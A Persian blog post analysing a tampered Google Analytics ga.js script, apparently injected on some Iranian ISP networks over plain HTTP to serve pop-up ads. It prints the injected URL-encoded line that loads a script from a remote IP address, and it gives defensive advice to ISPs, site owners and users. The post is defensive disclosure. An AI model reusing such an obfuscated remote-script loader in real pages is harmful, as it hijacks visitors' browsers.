چندی است که متوجه شدم گاهی در برخی سایتهای معتبر با  اولین کلیک روی صفحه پاپ آپی باز می شود و همچنین گاهی نیز در پس زمینه دیتای غیرمرتبط دانلود می شود. اگرچه بازشدن پاپ آپ تبلیغاتی بخصوص در سایتهای زرد ایرانی چندان غیرمعمول نیست اما در بین سایتهای معتبر فارسی کمی عجیب است. بررسی من نشان داد که گویا مشکل از اسکریپت سیستم آماری گوگل ( google analytics ) است که البته بصورت گسترده در بسیاری از سایتهای ایرانی و خارجی استفاده می شود. به نظر میرسد شبکه اینترنت برخی از سرویس دهندگان اینترنت در کشور (برخی از بزرگترین سرویس دهندگان) آلوده به کرم یا ویروسی است که با تغییر اسکریپت  http://www.google-analytics.com/ga.js و درج اسکریپ مخفی و کدشده در اسکریپت ابزار آماری گوگل عملا مرورگر کاربران را آلوده و برای مقاصد تبلیغاتی و کسب ترافیک و درآمد از آن استفاده میکند.
نکته مهم این است که این ویروس تنها امکان تغییر و آلوده کردن اسکریپت سیستم آماری گوگل را در حالت http دارد و در صورتی که اسکریپت https://www.google-analytics.com/ga.js فراخوانی شده باشد چنین مشکلی وجود نخواهد داشت و نسخه اصلی اسکریپت دانلود می شود.
بررسی نسخه آلوده و نسخه اصلی اسکریپت google analytics نشان از تغییراتی در کد دارد. برای مثال نسخه امروزی و اصلی این اسکریپت با این خطوط شروع می شوند

function(){var E;function Aa(a,b){switch(b)

و نسخه آلوده با این خط شروع می شود

(function(){var aa=encodeURIComponent,ba=Infinity,ca=setTimeout,da=isN

و البته این خطوط الزاما مخرب نیستند بلکه تنها تفاوت را نشان میدهند اما شاید نکته اصلی و امضای اصلی ویروس در اسکریپت تغییر یافته این کد باشد

t.src=decodeURIComponent("%68%74%74%70%3a%2f%2f%37%38%2e%34%
36%2e%35%31%2e%37%32%2f%73%74%61%74%73%2f%37%39%33%46%31")


همانطور که اهل فن متوجه می شوند اسکریپت آلوده خود اسکریپت دیگری را (احتمالا به صورت رندم) به صفحه اضافه می کند این کد اسکریپتی دیگر با آدرس http://78.46.51.72/stats/793F1 فراخوانی می کند که قاعدتا ارتباطی به گوگل ندارد و در نسخه اصلی این اسکریپت نیز وجود ندارد.

احتمالا ویروس فوق تنها برای سو استفاده تجاری و کسب درآمد این تغییرات را روی اسکرپیت گوگل آنالیتیکس میدهد اما شخصاً مشاهده کردم که گاهی تبلیغات سایتهای پورن و غیراخلاقی را بصورت پاپ آپ باز می کند. همچنین الزاما همواره این اسکریپت تغییر یافته برای کاربران ارسال نمی شود و به نظر میرسد یا تنها برخی کامپیوترها در شبکه سرویس دهندگان اینترنت آلوده است یا این کرم اینترنتی بصورت رندم و تصادفی این اسکریپت را تغییر و آلوده می کند. نگرانی من آن است که این کرم اینترنتی اسکرپیتهای معتبر دیگر مانند jquery که معمولا از CDN های معروف فراخوانی می شود نیز آلوده کند.
لازم است در ارتباط با این مشکل هم سرویس دهندگان اینترنت در کشور و هم مدیران سایتها و هم کاربران اینترنت دقت لازم را داشته و حداقل موارد زیر را رعایت کنند.

1.سرویس دهندگان اینترنت تمام کامپیوترهایی که به نحوی ترافیک درخواستی کاربران از آنها عبور می کند را بازبینی و نسبت به حذف ویروس یا کرم اینترنت احتمالی اقدام کنند.

2. سایتهای ایرانی برای فراخوانی اسکریپت google analytics تنها از نسخه https  این اسکریپت استفاده کنند. گاهی لازم است تغییراتی در کد و اسکریپت این ابزار در صفحات سایت داده شود تا صرفاً نسخه https فراخوانی شود.

3.کاربران مرورگرهای مختلف لازم است نسبت به حذف اطلاعات cache  شده (محتوای ذخیره شده صفحات دیده شده ،کوکی ها و..) و history  اقدام کنند.(در برخی مرورگرها لازم است ریست settings  انجام شود) چرا که حتی اگر مشکل از سمت سرویس دهندگان اینترنت نیز حل شود تا زمانی که صفحات آلوده کش شده حذف نشوند مشکل برای کاربران همچنان وجود خواهد داشت. همچنین هرگاه در یک سایت معتبر فارسی شاهد باز شدن پاپ آپ و یا تغییر خودکار آدرس به یک سایت دیگر (بخصوص سایتی تبلیغاتی) بودید حتماً اقدام به حذف صفحات کش شده کنید.



نظرات شما عزیزان:

نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه: